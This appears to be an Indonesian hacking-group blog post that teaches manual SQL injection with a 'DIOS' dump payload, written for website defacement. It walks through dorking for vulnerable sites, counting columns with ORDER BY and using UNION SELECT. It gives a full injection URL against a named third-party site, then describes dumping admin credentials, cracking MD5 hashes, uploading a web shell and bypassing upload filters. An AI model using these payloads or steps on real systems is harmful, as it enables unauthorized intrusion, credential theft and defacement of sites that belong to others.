Pemblokir Iklan Terdeteksi

Matikan adBlock anda untuk dapat mengakses situs ini.

translate to english

[SQLi] deface poc SQLi with DIOS (Dump in one shot)

 


Hello world
lama kaga aplod :v

liat title kawand

kali ini gw kasih tau cara SQLi manual / Sqli with DIOS
langsung gas ke tutorial nya...
Bahan² :

1.Browser
2.dork jitu adalan gw : 


3.internet
4.Kesabaran tentunya
Step by step :

1. Dorking dulu ngab... cari target nya... trs pastikan ada tulisan "You have an error in your SQL syntax" di dalem website ny kalo g ada tambahin parameter tanda ' atau %27 dibelakang angka

2. nah kl bener² udah ada text "You have an error in your SQL syntax" langsung kita order by 

tambahkan parameter dibelakang %27 

+order+by+1--+-

tambahin angkanya sampe error

nah disini target gw pas angka 8 error nya


maka sudah dipastikan tabel nya ada 7

3.maka lanjut kita union select dan kasih tanda (-) *tanpa tanda kurung
didepan tulisan "id=" sebelum angka


tambahkan parameter ini (angka sesuai tabel)

+union+select+[jumlah,Tabel]--+-

contoh :
http://site.co.il/index.php?id=-12+union+select+1,2,3,4,5,6,7--+-

karena tabel ny ada 7





ok lanjut...
maka akan muncul kode AJAIB...

dan disini target gw angka ajaib nya adalah 2

maka pastekan kode inject DIOS ini tepat di bagian angka itu



contoh :
http://kansascitynova.org/news.php?id=-42%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7--+-


karena angka ajaib nya adalah 2
jadi angka 2 nya di ganti kode inject


4.Maka akan muncul beberapa tabel

saatnya membuka tabel yg berhubungan dgn admin untuk mengetahui user dan pw admin

masukkan kode inject untuk membuka tabel ini


 

Yang gw Tandai [ ] Yang Harus Kalian Ganti sesuai dengan tabel



5.Maka terbukalah tabel admin nya dan terlihat user+pw nya
disini pw nya masih berbentuk md5 jadi harus di encode dengan md5 hash killer (*kalian bisa search di google banyak)



6.jika dah di encode lalu kalian cari admin login nya dan kalian upload shell kalian
kl g bisa ya bypass ext nya


 note : kalo ngindex ya backup dulu ya kak 😔 karena membuat tak semudah menghancurkan... 



[selesai]

don't forget to share to your friends^^

#happy learn


Posting Komentar

Berkomentar lah dengan sopan dan tidak spam, Dan Centang Kotak (beritahu saya) untuk mendapatkan Update mengenai komentar kamu
© W4FXploit . All rights reserved. Developer By W$FXploit
W4FXploiters Support
Silahkan beritahu apa yang bisa kami bantu dan kami akan menjawab pertanyaan Anda.
Halo, ada yang bisa kami bantu?
Kirim